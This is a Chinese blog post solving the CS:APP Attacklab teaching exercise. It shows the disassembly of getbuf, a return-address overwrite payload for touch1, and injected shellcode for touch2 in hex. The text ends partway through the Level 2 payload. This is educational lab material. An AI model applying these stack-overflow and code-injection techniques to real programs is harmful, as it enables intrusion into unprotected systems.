<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css" integrity="sha256-2H3fkXt6FEmrReK448mDVGKb3WW2ZZw35gI7vqHOE4Y=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ysjyx7.github.io","root":"/","images":"/images","scheme":"Gemini","version":"8.7.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>


<script type="text/javascript" src="/js/cursor/zjAdd.js"></script>

<div class="musicwyy2" style="position:fixed;left:0px;bottom:0px;z-index:105;opacity: 1; 
    width: 30px;
    height: 110px;    font-size: 15px;
    font-family: 'Long Cang';">

  <button type="button" style="
    width: 30px;
    height: 66px;
    margin-top: 10px;
    margin-bottom: 10px;
    border-width: 0px;
    background: #f5f5f5;
    z-index:200;" onclick="musicChange()"> 播放器</button>

</div> 



<div class="musicwyy1" style="position:fixed;left:0px;bottom:0px;z-index:100;opacity: 1; 
    width: 300px;
    height: 110px;font-size: 0;">

  <div class="aplayer-miniswitcher" style="
    height: 110px;
    width: 20px;
    display: inline-block; overflow: hidden;">



  </div>

  <div style="
    width: calc(100% - 30px);
    height: 110px;
    display: inline-block;" id="musicZJ">

<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=4968365&auto=1&height=66"></iframe>

  </div>
  
</div>
<meta name="description" content="关于Attacklab思路的简单介绍">
<meta property="og:type" content="article">
<meta property="og:title" content="Attacklab">
<meta property="og:url" content="https://ysjyx7.github.io/2022/03/27/Attacklab/index.html">
<meta property="og:site_name" content="ysjhust">
<meta property="og:description" content="关于Attacklab思路的简单介绍">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200713473.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200735449.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200753701.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327220701062.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330092727890.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330084217412.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220330093106410.png">
<meta property="article:published_time" content="2022-03-27T05:39:22.000Z">
<meta property="article:modified_time" content="2022-03-30T01:31:18.560Z">
<meta property="article:author" content="ysjhust">
<meta property="article:tag" content="csapp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200713473.png">


<link rel="canonical" href="https://ysjyx7.github.io/2022/03/27/Attacklab/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ysjyx7.github.io/2022/03/27/Attacklab/","path":"2022/03/27/Attacklab/","title":"Attacklab"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Attacklab | ysjhust</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">ysjhust</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">https://ysjyx7.github.io</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B7%A5%E5%85%B7%E4%B8%8E%E6%9D%90%E6%96%99"><span class="nav-number">1.</span> <span class="nav-text">工具与材料</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Part-1"><span class="nav-number">2.</span> <span class="nav-text">Part 1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-1"><span class="nav-number">2.1.</span> <span class="nav-text">Level 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-2"><span class="nav-number">2.2.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-3"><span class="nav-number">2.3.</span> <span class="nav-text">Level 3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Part-2"><span class="nav-number">3.</span> <span class="nav-text">Part 2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-2-1"><span class="nav-number">3.1.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-3-1"><span class="nav-number">3.2.</span> <span class="nav-text">Level 3</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-overview">
            <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ysjhust"
      src="/images/%E5%A4%B4%E5%83%8F.jpg">
  <p class="site-author-name" itemprop="name">ysjhust</p>
  <div class="site-description" itemprop="description">Hello World!</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">66</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">33</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">28</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/ysjyx7" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ysjyx7" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/2849458605@qq.com" title="E-Mail → 2849458605@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.zhihu.com/people/yang-lao-er-25-83" title="知乎 → https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;yang-lao-er-25-83" rel="noopener" target="_blank"><i class="fab fa-zhihu fa-fw"></i>知乎</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/m0_55101026?spm=1001.2101.3001.5343" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;m0_55101026?spm&#x3D;1001.2101.3001.5343" rel="noopener" target="_blank"><i class="fa fa-book fa-fw"></i>CSDN</a>
      </span>
  </div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdn.jsdelivr.net/npm/@creativecommons/vocabulary@2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>



          </div>
        </div>
      </div>

    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/ysjyx7" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ysjyx7.github.io/2022/03/27/Attacklab/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/%E5%A4%B4%E5%83%8F.jpg">
      <meta itemprop="name" content="ysjhust">
      <meta itemprop="description" content="Hello World!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ysjhust">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Attacklab
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-03-27 13:39:22" itemprop="dateCreated datePublished" datetime="2022-03-27T13:39:22+08:00">2022-03-27</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-03-30 09:31:18" itemprop="dateModified" datetime="2022-03-30T09:31:18+08:00">2022-03-30</time>
      </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>7 分钟</span>
    </span>
</div>

            <div class="post-description">关于Attacklab思路的简单介绍</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="工具与材料"><a href="#工具与材料" class="headerlink" title="工具与材料"></a>工具与材料</h1><p>​	主要用的工具和Bomblab一样，tmux+gdb+vim的组合。</p>
<p>​	Attacklab主要和csapp的3.10.3和3.10.4联系密切，另外其实也需要参考官方的文档，即<a target="_blank" rel="noopener" href="http://csapp.cs.cmu.edu/3e/attacklab.pdf">官方文档</a>，这里面给出了整个lab中文件的介绍以及一些提示。</p>
<h1 id="Part-1"><a href="#Part-1" class="headerlink" title="Part 1"></a>Part 1</h1><p>​	这一部分由三个小部分组成，主要涉及到了代码注入攻击。</p>
<p>​	另外，根据官方文档，接下来的三个小部分都和两个函数有关，代码直接贴在下面：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="title">getbuf</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> buf[BUFFER_SIZE];</span><br><span class="line">	<span class="built_in">Gets</span>(buf); <span class="comment">//和C标准库中的gets函数一样，就是那个很危险的函数。</span></span><br><span class="line">	<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> val;</span><br><span class="line">	val = <span class="built_in">getbuf</span>();</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;No exploit. Getbuf returned 0x%x\n&quot;</span>, val);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	相应的，我们可以看看这两个函数的反汇编，为后面做一些准备。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">00000000004017a8 &lt;getbuf&gt;:</span><br><span class="line">  4017a8:       48 83 ec 28             sub    $0x28,%rsp</span><br><span class="line">  4017ac:       48 89 e7                mov    %rsp,%rdi</span><br><span class="line">  4017af:       e8 8c 02 00 00          callq  401a40 &lt;Gets&gt;</span><br><span class="line">  4017b4:       b8 01 00 00 00          mov    $0x1,%eax</span><br><span class="line">  4017b9:       48 83 c4 28             add    $0x28,%rsp</span><br><span class="line">  4017bd:       c3                      retq</span><br><span class="line">  4017be:       90                      nop</span><br><span class="line">  4017bf:       90                      nop</span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">0000000000401968 &lt;test&gt;:</span><br><span class="line">  401968:       48 83 ec 08             sub    $0x8,%rsp</span><br><span class="line">  40196c:       b8 00 00 00 00          mov    $0x0,%eax</span><br><span class="line">  401971:       e8 32 fe ff ff          callq  4017a8 &lt;getbuf&gt;</span><br><span class="line">  401976:       89 c2                   mov    %eax,%edx</span><br><span class="line">  401978:       be 88 31 40 00          mov    $0x403188,%esi</span><br><span class="line">  40197d:       bf 01 00 00 00          mov    $0x1,%edi</span><br><span class="line">  401982:       b8 00 00 00 00          mov    $0x0,%eax</span><br><span class="line">  401987:       e8 64 f4 ff ff          callq  400df0 &lt;__printf_chk@plt&gt;</span><br><span class="line">  40198c:       48 83 c4 08             add    $0x8,%rsp</span><br><span class="line">  401990:       c3                      retq</span><br><span class="line">  401991:       90                      nop</span><br><span class="line">  401992:       90                      nop</span><br><span class="line">  401993:       90                      nop</span><br><span class="line">  401994:       90                      nop</span><br><span class="line">  401995:       90                      nop</span><br><span class="line">  401996:       90                      nop</span><br><span class="line">  401997:       90                      nop</span><br><span class="line">  401998:       90                      nop</span><br><span class="line">  401999:       90                      nop</span><br><span class="line">  40199a:       90                      nop</span><br><span class="line">  40199b:       90                      nop</span><br><span class="line">  40199c:       90                      nop</span><br><span class="line">  40199d:       90                      nop</span><br><span class="line">  40199e:       90                      nop</span><br><span class="line">  40199f:       90                      nop</span><br></pre></td></tr></table></figure>

<p>​	从<code>getbuf</code>函数的反汇编中我们可以看出它开辟了40个字节的栈空间。</p>
<p>​	所以在这一部分我们要做的就是利用那个不安全的<code>gets</code>函数来做一些攻击。</p>
<h2 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h2><p>​	这个部分不需要我们进行代码注入攻击，我们只需要通过更改<code>getbuf</code>函数返回的地址来执行<code>touch1</code>函数即可，那我们先看一下这个函数的反汇编</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">00000000004017c0 &lt;touch1&gt;:</span><br><span class="line">  4017c0:       48 83 ec 08             sub    $0x8,%rsp</span><br><span class="line">  4017c4:       c7 05 0e 2d 20 00 01    movl   $0x1,0x202d0e(%rip)        # 6044dc &lt;vlevel&gt;</span><br><span class="line">  4017cb:       00 00 00</span><br><span class="line">  4017ce:       bf c5 30 40 00          mov    $0x4030c5,%edi</span><br><span class="line">  4017d3:       e8 e8 f4 ff ff          callq  400cc0 &lt;puts@plt&gt;</span><br><span class="line">  4017d8:       bf 01 00 00 00          mov    $0x1,%edi</span><br><span class="line">  4017dd:       e8 ab 04 00 00          callq  401c8d &lt;validate&gt;</span><br><span class="line">  4017e2:       bf 00 00 00 00          mov    $0x0,%edi</span><br><span class="line">  4017e7:       e8 54 f6 ff ff          callq  400e40 &lt;exit@plt&gt;</span><br></pre></td></tr></table></figure>

<p>​	首先，在刚刚我们已经发现<code>getbuf</code>函数开辟了40个字节的栈空间，根据书中3.8节的知识，在调用函数时会先将原函数的返回位置压入栈，然后新函数开辟栈帧，那么我们要做的其实就是通过缓冲区把那个返回位置覆盖掉，改写成<code>touch1()</code>函数的地址就行，因此只需要输入下面的内容即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00 00 00</span><br><span class="line">c0 17 40 </span><br></pre></td></tr></table></figure>

<p>​	注意，在栈上填写地址的时候要注意是小端法存储，所以需要倒这来。</p>
<p>​	我们利用文档里的输入方法，看一下是否正确，输出如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$&gt;./hex2raw &lt; phase1.txt | ./ctarget -q</span><br><span class="line"><span class="attr">Cookie</span>: <span class="number">0x59b997fa</span></span><br><span class="line">Type string:Touch1!: You called touch1()</span><br><span class="line">Valid solution <span class="keyword">for</span> level <span class="number">1</span> <span class="keyword">with</span> target ctarget</span><br><span class="line"><span class="attr">PASS</span>: Would have posted the following:</span><br><span class="line">        user id bovik</span><br><span class="line">        course  <span class="number">15213</span>-f15</span><br><span class="line">        lab     attacklab</span><br><span class="line">        result  <span class="number">1</span>:PASS:<span class="number">0xffffffff</span>:ctarget:<span class="number">1</span>:<span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> C0 <span class="number">17</span> <span class="number">40</span></span><br></pre></td></tr></table></figure>

<p>​	这个过程中的栈帧变化如下图所示。	</p>
<p><img src="https://cdn.jsdelivr.net/gh/ysjyx7/img@main/image-20220327200713473.png" alt="image-20220327200713473"></p>
<p>​	这里我想额外记录一下Linux命令行中<code>| &amp;&amp; &amp; ||</code>的含义，这个在之前好像接触过，但是因为没怎么用过就给忘了。</p>
<ul>
<li><code>&amp;</code> 表示任务在后台执行，这个在使用geth的时候用过，经常和<code>nohup</code>命令一起使用</li>
<li><code>&amp;&amp;</code> 表示前一条命令执行成功时，才执行后一条命令 ，如 <code>echo &#39;1‘ &amp;&amp; echo &#39;2&#39;</code>   </li>
<li><code>|</code> 表示管道，上一条命令的输出，作为下一条命令参数，如 <code>echo &#39;yes&#39; | wc -l</code></li>
<li><code>||</code> 表示上一条命令执行失败后，才执行下一条命令，如 cat <code>nofile || echo &quot;fail&quot;</code></li>
</ul>
<h2 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h2><p>​	这里是要把一小部分代码注入到源程序中。</p>
<p>​	最开始的要求和Level 1是一样的，不过这次是跳转到<code>touch2</code>函数，C语言定义如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">touch2</span><span class="params">(<span class="keyword">unsigned</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	vlevel = <span class="number">2</span>; <span class="comment">/* Part of validation protocol */</span></span><br><span class="line">	<span class="keyword">if</span> (val == cookie) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Touch2!: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">		<span class="built_in">validate</span>(<span class="number">2</span>);</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">		<span class="built_in">fail</span>(<span class="number">2</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	根据函数定义，可以知道这里我们需要把文件夹下的<code>cookies.txt</code>中的内容作为函数参数，所以相比于上一个问题，这里多了一个传参的过程，所以不能简单地修改返回地址，这样就无法传递参数了。</p>
<p>​	记得之前提到过，函数的第一个参数是通过寄存器<code>%rdi</code>传递的，所以我们需要想办法修改这个寄存器的值，另外题目中也提示到了我们需要注入一段代码，那这段代码大概需要实现下面的功能：</p>
<ul>
<li>设置寄存器<code>%rdi</code>的值</li>
<li>返回到<code>touch2</code>函数的入口</li>
</ul>
<p>​    那么，我们大概需要使用这样三条汇编指令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov $0x59b997fa, %rdi # 赋值</span><br><span class="line">pushq $0x4017ec # 0x4017ec是touch2的开始地址</span><br><span class="line">retq</span><br></pre></td></tr></table></figure>

<p>​	可以将其编译成机器码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$&gt; gcc -c test.s</span><br><span class="line">$&gt; objdump -d test.o</span><br><span class="line">0000000000000000 &lt;.text&gt;:</span><br><span class="line">   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi</span><br><span class="line">   7:   68 ec 17 40 00          pushq  $0x4017ec</span><br><span class="line">   c:   c3                      retq</span><br></pre></td></tr></table></figure>

<p>​	然后我们需要考虑一下如何去执行这段代码。事实上，根据之前写<code>touch1()</code>的经验，我们只需要通过缓冲区溢出来更改程序的返回地址，让它返回到想要的位置即可。这个具体希望的位置很多，为了简单起见，我们就把我们实现的指令放到栈底吧，那我们可以用gdb查看一下<code>getbufer</code>函数对应的栈底位置。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">(gdb) b *0x4017ac</span><br><span class="line">(gdb) r -q </span><br><span class="line">(gdb) info r rsp</span><br><span class="line">rsp            0x5561dc78       0x5561dc78</span><br></pre></td></tr></table></figure>

<p>​	因此，我们只需要输入如下字节即可</p>
<figure class="highlight d"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">48</span> c7 c7 fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">68</span></span><br><span class="line">ec <span class="number">17</span> <span class="number">40</span> <span class="number">0</span>0 c3 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0</span><br><span class="line"><span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0</span><br><span class="line"><span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0 <span class="number">0</span>0</span><br><span class="line"><span class="number">78</span> dc <span 